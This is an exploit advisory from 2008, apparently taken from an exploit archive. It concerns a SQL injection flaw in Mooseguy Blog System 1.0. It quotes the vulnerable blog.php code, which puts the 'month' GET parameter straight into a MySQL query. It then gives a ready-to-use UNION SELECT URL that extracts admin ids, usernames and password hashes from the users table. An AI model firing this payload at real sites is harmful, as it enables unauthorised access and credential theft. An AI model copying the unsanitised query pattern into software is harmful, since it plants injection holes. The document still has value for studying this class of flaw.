Mooseguy Blog System 1.0 (blog.php month) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mooseguy Blog System 1.0 (blog.php month) SQL Injection Vulnerability
# Published : 2008-01-21
# Author : The_HuliGun
# Previous Title : Coppermine Photo Gallery 1.4.10 Remote SQL Injection Exploit
# Next Title : boastMachine <= 3.1 (mail.php id) SQL Injection Vulnerability

# MGBS 1.0 Remote SQL injection

# Script url http://sourceforge.net/project/showfiles.php?group_id=193233

# Vulnerable code in blog.php 
 
 <?php
   $month = $_GET['month'];
   $result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
   ...

# Admin hash exploit

http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/*

# Bug discovered by The_HuliGun

# Greetz to: forum.antichat.ru

# www.Syue.com [2008-01-21]